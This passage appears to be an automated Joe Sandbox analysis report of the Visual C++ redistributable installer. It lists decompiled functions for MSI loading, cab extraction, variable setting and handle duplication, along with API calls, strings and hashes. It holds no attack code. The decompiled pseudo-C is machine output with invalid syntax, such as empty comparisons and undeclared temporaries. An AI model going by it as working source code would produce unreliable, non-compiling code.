                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C1D6
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C1D9
                                                                          • GetLastError.KERNEL32(?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C1E3
                                                                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C235
                                                                          • GetLastError.KERNEL32(?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C23F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                          • String ID: @Met$Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                          • API String ID: 2619879409-879908813
                                                                          • Opcode ID: 61ec5fec801fb19588f135c17dc8297eb065279db0f8f9df9bfb21411527f774
                                                                          • Instruction ID: 1c7781d3d922207403f5775dda54844068df580b1438cd98fa927af456ba1d60
                                                                          • Opcode Fuzzy Hash: 61ec5fec801fb19588f135c17dc8297eb065279db0f8f9df9bfb21411527f774
                                                                          • Instruction Fuzzy Hash: DB41B272280301ABEB209F6ADC45FA73BE9EB85751F114129FD08DB291DA75D841CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000529B3(void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                          				signed int _v8;
                                                                          				void* _t8;
                                                                          				_Unknown_base(*)()* _t12;
                                                                          				_Unknown_base(*)()* _t13;
                                                                          				_Unknown_base(*)()* _t14;
                                                                          				_Unknown_base(*)()* _t15;
                                                                          				_Unknown_base(*)()* _t16;
                                                                          				_Unknown_base(*)()* _t17;
                                                                          				_Unknown_base(*)()* _t18;
                                                                          				intOrPtr _t20;
                                                                          				intOrPtr _t22;
                                                                          				intOrPtr _t24;
                                                                          				intOrPtr _t26;
                                                                          				intOrPtr _t28;
                                                                          				intOrPtr _t30;
                                                                          				intOrPtr _t32;
                                                                          				void* _t36;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t8 = E000137EA(__edx, L"Msi.dll", 0x7b680,  &_v8); // executed
                                                                          				_t36 = _t8;
                                                                          				if(_t36 >= 0) {
                                                                          					E00054932(_v8, 0x7b684, 0x7b688); // executed
                                                                          					_t12 = GetProcAddress( *0x7b680, "MsiDeterminePatchSequenceW");
                                                                          					_t20 =  *0x7b68c; // 0x6d39be10
                                                                          					_t21 =  ==  ? _t12 : _t20;
                                                                          					 *0x7b6a8 = _t12;
                                                                          					 *0x7b68c =  ==  ? _t12 : _t20;
                                                                          					_t13 = GetProcAddress( *0x7b680, "MsiDetermineApplicablePatchesW");
                                                                          					_t22 =  *0x7b690; // 0x6d39a130
                                                                          					_t23 =  ==  ? _t13 : _t22;
                                                                          					 *0x7b6ac = _t13;
                                                                          					 *0x7b690 =  ==  ? _t13 : _t22;
                                                                          					_t14 = GetProcAddress( *0x7b680, "MsiEnumProductsExW");
                                                                          					_t24 =  *0x7b694; // 0x6d3a03d0
                                                                          					_t25 =  ==  ? _t14 : _t24;
                                                                          					 *0x7b6b0 = _t14;
                                                                          					 *0x7b694 =  ==  ? _t14 : _t24;
                                                                          					_t15 = GetProcAddress( *0x7b680, "MsiGetPatchInfoExW");
                                                                          					_t26 =  *0x7b698; // 0x6d3a3560
                                                                          					_t27 =  ==  ? _t15 : _t26;
                                                                          					 *0x7b6b4 = _t15;
                                                                          					 *0x7b698 =  ==  ? _t15 : _t26;
                                                                          					_t16 = GetProcAddress( *0x7b680, "MsiGetProductInfoExW");
                                                                          					_t28 =  *0x7b69c; // 0x6d2cac90
                                                                          					_t29 =  ==  ? _t16 : _t28;
                                                                          					 *0x7b6b8 = _t16;
                                                                          					 *0x7b69c =  ==  ? _t16 : _t28;
                                                                          					_t17 = GetProcAddress( *0x7b680, "MsiSetExternalUIRecord");
                                                                          					_t30 =  *0x7b6a0; // 0x6d3a71b0
                                                                          					_t31 =  ==  ? _t17 : _t30;
                                                                          					 *0x7b6bc = _t17;
                                                                          					 *0x7b6a0 =  ==  ? _t17 : _t30;
                                                                          					_t18 = GetProcAddress( *0x7b680, "MsiSourceListAddSourceExW");
                                                                          					_t32 =  *0x7b6a4; // 0x6d3a7ec0
                                                                          					 *0x7b6c0 = _t18;
                                                                          					_t33 =  ==  ? _t18 : _t32;
                                                                          					 *0x7b6c4 = 1;
                                                                          					 *0x7b6a4 =  ==  ? _t18 : _t32;
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t36;
                                                                          			}





















                                                                          APIs
                                                                            • Part of subcall function 000137EA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00013829
                                                                            • Part of subcall function 000137EA: GetLastError.KERNEL32 ref: 00013833
                                                                            • Part of subcall function 00054932: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0005495A
                                                                          • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 000529FD
                                                                          • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00052A20
                                                                          • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00052A43
                                                                          • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00052A66
                                                                          • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00052A89
                                                                          • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00052AAC
                                                                          • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00052ACF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                          • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                          • API String ID: 2510051996-1735120554
                                                                          • Opcode ID: 65bbcaec32bef088ffab385eccf1fee6a0645247208bdc64c1d38b549e1ae693
                                                                          • Instruction ID: 83bfba997f6b63877cad224bddbfec9fdd88b675da56fe743aeee48102717313
                                                                          • Opcode Fuzzy Hash: 65bbcaec32bef088ffab385eccf1fee6a0645247208bdc64c1d38b549e1ae693
                                                                          • Instruction Fuzzy Hash: CC31EFB0E41608AFFB18EF25EC56B5A3AE5B744700740842DE60EF6260D77EA880DF44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E00031484(void* _a4, intOrPtr _a8) {
                                                                          				void* _t11;
                                                                          				void* _t12;
                                                                          				void* _t13;
                                                                          				void* _t29;
                                                                          				void* _t30;
                                                                          
                                                                          				_t29 = _a4;
                                                                          				 *(_t29 + 0x3c) =  *(_t29 + 0x3c) | 0xffffffff;
                                                                          				_t30 = E000121A5(_t29 + 0x1c, _a8, 0);
                                                                          				if(_t30 >= 0) {
                                                                          					_t11 = CreateEventW(0, 1, 0, 0);
                                                                          					 *(_t29 + 0x24) = _t11;
                                                                          					if(_t11 != 0) {
                                                                          						_t12 = CreateEventW(0, 1, 0, 0);
                                                                          						 *(_t29 + 0x28) = _t12;
                                                                          						if(_t12 != 0) {
                                                                          							_t13 = CreateThread(0, 0, E00030E43, _t29, 0, 0); // executed
                                                                          							 *(_t29 + 0x20) = _t13;
                                                                          							if(_t13 != 0) {
                                                                          								_t30 = E00031224(_t29);
                                                                          								if(_t30 < 0) {
                                                                          									_push("Failed to wait for operation complete.");
                                                                          									goto L10;
                                                                          								}
                                                                          							} else {
                                                                          								_t34 =  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
                                                                          								_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "cabextract.cpp", 0x93, _t30);
                                                                          								_push("Failed to create extraction thread.");
                                                                          								goto L10;
                                                                          							}
                                                                          						} else {
                                                                          							_t37 =  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
                                                                          							_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "cabextract.cpp", 0x8f, _t30);
                                                                          							_push("Failed to create operation complete event.");
                                                                          							goto L10;
                                                                          						}
                                                                          					} else {
                                                                          						_t40 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cabextract.cpp", 0x8c, _t30);
                                                                          						_push("Failed to create begin operation event.");
                                                                          						goto L10;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to copy file name.");
                                                                          					L10:
                                                                          					_push(_t30);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t30;
                                                                          			}









                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0001C285,?,00000000,?,0001C319), ref: 000314BB
                                                                          • GetLastError.KERNEL32(?,0001C285,?,00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 000314C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorEventLast
                                                                          • String ID: @Met$Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                          • API String ID: 545576003-2765212422
                                                                          • Opcode ID: b63a4bbb943ca773830fa28cc14ffbed97c098129909c8470106878adaf9584e
                                                                          • Instruction ID: 4499301b36eaa2a603d3d3fb15db7d183a13050d57c73ea91f5ab934f80d0e32
                                                                          • Opcode Fuzzy Hash: b63a4bbb943ca773830fa28cc14ffbed97c098129909c8470106878adaf9584e
                                                                          • Instruction Fuzzy Hash: 7921D1B2B44B26BAF32266795C41AA775DCEF497A0F010222BD06FB181E754DC0089F6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E00030627(void* __ecx, CHAR* _a4) {
                                                                          				void* _v8;
                                                                          				long _t18;
                                                                          				void* _t19;
                                                                          				signed short _t22;
                                                                          				void* _t27;
                                                                          				int _t29;
                                                                          				signed short _t33;
                                                                          				signed int _t36;
                                                                          				int _t37;
                                                                          				signed int _t40;
                                                                          				void** _t44;
                                                                          				void* _t47;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_t40 =  *0x7aac0; // 0x0
                                                                          				_push(_t36);
                                                                          				_t37 = _t36 | 0xffffffff;
                                                                          				_t47 = 0;
                                                                          				_v8 = _t37;
                                                                          				_t44 =  *( *((intOrPtr*)( *[fs:0x2c] + _t40 * 4)) + 4);
                                                                          				_t18 = CompareStringA(0, 0, "<the>.cab", _t37, _a4, _t37); // executed
                                                                          				if(_t18 != 2) {
                                                                          					_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x8000080, 0);
                                                                          					_v8 = _t19;
                                                                          					if(_t19 == _t37) {
                                                                          						_t22 = GetLastError();
                                                                          						_t51 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          						_t47 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cabextract.cpp", 0x2d5, _t47);
                                                                          						E0005012F(_t47, "Failed to open cabinet file: %hs", _a4);
                                                                          					}
                                                                          					L8:
                                                                          					_t44[0xc] = _t47;
                                                                          					_t21 =  <  ? _t37 : _v8;
                                                                          					return  <  ? _t37 : _v8;
                                                                          				}
                                                                          				_t27 = GetCurrentProcess();
                                                                          				_t29 = DuplicateHandle(GetCurrentProcess(),  *_t44, _t27,  &_v8, 0, 0, _t18); // executed
                                                                          				if(_t29 != 0) {
                                                                          					_t47 = E000304BE(_t40,  &(_t44[7]), _v8, _t44[2], _t44[3]);
                                                                          					if(_t47 >= 0) {
                                                                          						goto L8;
                                                                          					}
                                                                          					_push("Failed to add virtual file pointer for cab container.");
                                                                          					L3:
                                                                          					_push(_t47);
                                                                          					E0005012F();
                                                                          					goto L8;
                                                                          				}
                                                                          				_t33 = GetLastError();
                                                                          				_t55 =  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
                                                                          				_t47 =  >=  ? 0x80004005 :  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
                                                                          				E000137D3(0x80004005, "cabextract.cpp", 0x2ca, _t47);
                                                                          				_push("Failed to duplicate handle to cab container.");
                                                                          				goto L3;
                                                                          			}
















                                                                          APIs
                                                                          • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00030657
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0003066F
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00030674
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00030677
                                                                          • GetLastError.KERNEL32(?,?), ref: 00030681
                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 000306F0
                                                                          • GetLastError.KERNEL32(?,?), ref: 000306FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                          • String ID: <the>.cab$@Met$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                          • API String ID: 3030546534-1066054086
                                                                          • Opcode ID: efd1b9959b02ef73878d83433c724e0e861af4b104ee8535ea2476800c1eebf2
                                                                          • Instruction ID: 6d0d5f76565920e16208aa4c85b41df1dc197c254f44b353c6d8f007564521a9
                                                                          • Opcode Fuzzy Hash: efd1b9959b02ef73878d83433c724e0e861af4b104ee8535ea2476800c1eebf2
                                                                          • Instruction Fuzzy Hash: D7312672A01725BBEB216BA58C49F9B7AEDEF05760F000125FD08F7190C7249D10CAE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 46%
                                                                          			E00016C5D(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
                                                                          				signed int _v8;
                                                                          				unsigned int _v12;
                                                                          				signed int _t44;
                                                                          				signed int _t53;
                                                                          				void* _t55;
                                                                          				void* _t57;
                                                                          				struct _CRITICAL_SECTION* _t68;
                                                                          				void* _t69;
                                                                          				signed int _t70;
                                                                          				signed int _t74;
                                                                          				signed int _t75;
                                                                          				unsigned int _t79;
                                                                          				intOrPtr _t80;
                                                                          				void* _t81;
                                                                          				intOrPtr _t82;
                                                                          				signed int* _t83;
                                                                          				void* _t84;
                                                                          
                                                                          				_t69 = __ecx;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t68 = _a4;
                                                                          				EnterCriticalSection(_t68);
                                                                          				_t80 = _a8;
                                                                          				_t81 = E000155B6(_t69, _t68, _t80,  &_v8);
                                                                          				if(_t81 >= 0) {
                                                                          					_t44 = _v8;
                                                                          					if(_t81 != 1) {
                                                                          						_t77 =  *(_t68 + 0x20);
                                                                          						_t70 = _t44 * 0x38;
                                                                          						_t82 =  *((intOrPtr*)(_t70 + _t77 + 0x2c));
                                                                          						if(_t82 <= 0 || _a20 == 1 || _a20 == 2 &&  *((intOrPtr*)(_t70 + _t77 + 0x28)) != 0 || _a20 == 3 && _t82 != 2) {
                                                                          							L14:
                                                                          							_t83 = _a12;
                                                                          							if(_a24 == 0) {
                                                                          								L31:
                                                                          								_a20 = _v8 * 0x38;
                                                                          								_t81 = E0003035B(_t77,  *(_t68 + 0x20) + 8 + _v8 * 0x38, _t83);
                                                                          								if(_t81 >= 0) {
                                                                          									 *((intOrPtr*)( *(_t68 + 0x20) + _a20 + 0x24)) = _a16;
                                                                          									goto L34;
                                                                          								}
                                                                          								_push(_t80);
                                                                          								_push("Failed to set value of variable: %ls");
                                                                          								goto L2;
                                                                          							}
                                                                          							_t77 =  *(_t68 + 0x20);
                                                                          							_t74 = _t44 * 0x38;
                                                                          							if( *((intOrPtr*)(_t74 + _t77 + 0x2c)) != 0) {
                                                                          								goto L31;
                                                                          							}
                                                                          							if( *((intOrPtr*)(_t74 + _t77 + 0x20)) == 0) {
                                                                          								_t53 = _t83[4];
                                                                          								if(_t53 == 0) {
                                                                          									if( *((intOrPtr*)(_t74 + _t77 + 0x18)) == 0) {
                                                                          										goto L31;
                                                                          									}
                                                                          									_push( *_t83);
                                                                          									L29:
                                                                          									_push(_t80);
                                                                          									_push("Unsetting variable \'%ls\'");
                                                                          									L30:
                                                                          									_push(2); // executed
                                                                          									E0005061A(); // executed
                                                                          									_t84 = _t84 + 0x10;
                                                                          									goto L31;
                                                                          								}
                                                                          								_t55 = _t53 - 1;
                                                                          								if(_t55 == 0) {
                                                                          									_push(_t83[1]);
                                                                          									_push( *_t83);
                                                                          									E0005061A(2, "Setting numeric variable \'%ls\' to value %lld", _t80);
                                                                          									_t84 = _t84 + 0x14;
                                                                          									goto L31;
                                                                          								}
                                                                          								_t57 = _t55 - 1;
                                                                          								if(_t57 == 0) {
                                                                          									if( *_t83 != 0) {
                                                                          										_push( *_t83);
                                                                          										_push(_t80);
                                                                          										_push("Setting string variable \'%ls\' to value \'%ls\'");
                                                                          										goto L30;
                                                                          									}
                                                                          									_push(0);
                                                                          									goto L29;
                                                                          								}
                                                                          								if(_t57 == 1) {
                                                                          									_t75 =  *_t83;
                                                                          									_t79 = _t83[1];
                                                                          									_push(_t75 & 0x0000ffff);
                                                                          									_v12 = _t79;
                                                                          									_push((_t79 << 0x00000020 | _t75) >> 0x10 & 0x0000ffff);
                                                                          									_push(_t79 & 0x0000ffff);
                                                                          									_t77 = _t79 >> 0x10;
                                                                          									_push(_t79 >> 0x10);
                                                                          									E0005061A(2, "Setting version variable \'%ls\' to value \'%hu.%hu.%hu.%hu\'", _t80);
                                                                          									_t84 = _t84 + 0x1c;
                                                                          								}
                                                                          								goto L31;
                                                                          							}
                                                                          							E0005061A(2, "Setting hidden variable \'%ls\'", _t80);
                                                                          							_t84 = _t84 + 0xc;
                                                                          							goto L31;
                                                                          						} else {
                                                                          							_t81 = 0x80070057;
                                                                          							E000137D3(_t44, "variable.cpp", 0x605, 0x80070057);
                                                                          							_push(_t80);
                                                                          							_push("Attempt to set built-in variable value: %ls");
                                                                          							L2:
                                                                          							_push(_t81);
                                                                          							E0005012F();
                                                                          							_t84 = _t84 + 0xc;
                                                                          							L34:
                                                                          							LeaveCriticalSection(_t68);
                                                                          							if(_t81 < 0 && _a24 != 0) {
                                                                          								_push(_t81);
                                                                          								E0005061A(2, "Setting variable failed: ID \'%ls\', HRESULT 0x%x", _t80);
                                                                          							}
                                                                          							return _t81;
                                                                          						}
                                                                          					}
                                                                          					_t81 = E00016AC6(_t44, _t69, _t68, _t80, _t44);
                                                                          					if(_t81 >= 0) {
                                                                          						_t44 = _v8;
                                                                          						goto L14;
                                                                          					}
                                                                          					_push(_t80);
                                                                          					_push("Failed to insert variable \'%ls\'.");
                                                                          					goto L2;
                                                                          				}
                                                                          				_push(_t80);
                                                                          				_push("Failed to find variable value \'%ls\'.");
                                                                          				goto L2;
                                                                          			}





















                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000001,?,00000000,0001533D,00000000,00000001), ref: 00016C6E
                                                                            • Part of subcall function 000155B6: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,00000007,0001648B,0001648B,?,0001554A,?,?,00000000), ref: 000155F2
                                                                            • Part of subcall function 000155B6: GetLastError.KERNEL32(?,0001554A,?,?,00000000,?,00000000,0001648B,?,00017DDC,?,?,?,?,?), ref: 00015621
                                                                          • LeaveCriticalSection.KERNEL32(00000001,?,00000001), ref: 00016E02
                                                                          Strings
                                                                          • Unsetting variable '%ls', xrefs: 00016DBE
                                                                          • Setting hidden variable '%ls', xrefs: 00016D2C
                                                                          • Setting string variable '%ls' to value '%ls', xrefs: 00016D96
                                                                          • Setting numeric variable '%ls' to value %lld, xrefs: 00016DA3
                                                                          • Attempt to set built-in variable value: %ls, xrefs: 00016CFC
                                                                          • Failed to find variable value '%ls'., xrefs: 00016C89
                                                                          • Failed to set value of variable: %ls, xrefs: 00016DEA
                                                                          • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00016E14
                                                                          • Failed to insert variable '%ls'., xrefs: 00016CB3
                                                                          • variable.cpp, xrefs: 00016CF1
                                                                          • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00016D79
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                          • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                          • API String ID: 2716280545-445000439
                                                                          • Opcode ID: 2d5693da4dc9162c4dc6e717128e15ec15c4bbede7e9c41f9c94baa20053caef
                                                                          • Instruction ID: 58f148e5df89dd86da48362b013c8d6d6df25f892392f5642966fde6e50d1c6a
                                                                          • Opcode Fuzzy Hash: 2d5693da4dc9162c4dc6e717128e15ec15c4bbede7e9c41f9c94baa20053caef
                                                                          • Instruction Fuzzy Hash: 7851E371F00225ABDB309E14DD4AFFB7AA8EB95705F10011EFC455A282D272DDD5CAE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 52%
                                                                          			E00026859(void* __ecx, void* _a4, signed int* _a8, intOrPtr* _a12) {
                                                                          				void* _v8;
                                                                          				void* _t12;
                                                                          				int _t14;
                                                                          				signed int _t17;
                                                                          				void* _t18;
                                                                          				signed int* _t29;
                                                                          				void* _t33;
                                                                          
                                                                          				_v8 = _v8 | 0xffffffff;
                                                                          				_t29 = _a8;
                                                                          				 *_t29 =  *_t29 | 0xffffffff;
                                                                          				_t12 = GetCurrentProcess();
                                                                          				_t14 = DuplicateHandle(GetCurrentProcess(), _a4, _t12,  &_v8, 0, 1, 2); // executed
                                                                          				if(_t14 != 0) {
                                                                          					_push(_v8);
                                                                          					_t15 = _a12;
                                                                          					_push(L"burn.filehandle.attached");
                                                                          					_t33 = E00011F62(_a12, L"%ls -%ls=%u",  *_t15);
                                                                          					if(_t33 >= 0) {
                                                                          						_t17 = _v8;
                                                                          						 *_t29 = _t17;
                                                                          						_t18 = _t17 | 0xffffffff;
                                                                          						_v8 = _t18;
                                                                          					} else {
                                                                          						_push("Failed to append the file handle to the command line.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t37 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
                                                                          					_t33 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "core.cpp", 0x3da, _t33);
                                                                          					_push("Failed to duplicate file handle for attached container.");
                                                                          					L2:
                                                                          					_push(_t33);
                                                                          					E0005012F();
                                                                          					_t18 = _v8;
                                                                          				}
                                                                          				if(_t18 != 0xffffffff) {
                                                                          					CloseHandle(_t18);
                                                                          				}
                                                                          				return _t33;
                                                                          			}











                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00014D0B,?,?), ref: 00026879
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?,00014D0B,?,?), ref: 0002687F
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,?,00014D0B,?,?), ref: 00026882
                                                                          • GetLastError.KERNEL32(?,?,00014D0B,?,?), ref: 0002688C
                                                                          • CloseHandle.KERNEL32(000000FF,?,00014D0B,?,?), ref: 00026905
                                                                          Strings
                                                                          • Failed to append the file handle to the command line., xrefs: 000268ED
                                                                          • %ls -%ls=%u, xrefs: 000268D9
                                                                          • Failed to duplicate file handle for attached container., xrefs: 000268BA
                                                                          • burn.filehandle.attached, xrefs: 000268D2
                                                                          • core.cpp, xrefs: 000268B0
                                                                          • @Met, xrefs: 0002688C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                          • String ID: %ls -%ls=%u$@Met$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                                          • API String ID: 4224961946-3980959953
                                                                          • Opcode ID: 2acc5cbbdf49eb2eddff20a02e992ae7c2d62f2e7f743d7489f52ca182ba4ad3
                                                                          • Instruction ID: f927db3ba00f8a074a3709bae21620b1db9efa250e99c5e83497d97c59bdeba7
                                                                          • Opcode Fuzzy Hash: 2acc5cbbdf49eb2eddff20a02e992ae7c2d62f2e7f743d7489f52ca182ba4ad3
                                                                          • Instruction Fuzzy Hash: 05119331A40725FBDB20ABB99D05A9F7BADAF04B31F100326F910EB1E1DB759D0196A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 76%
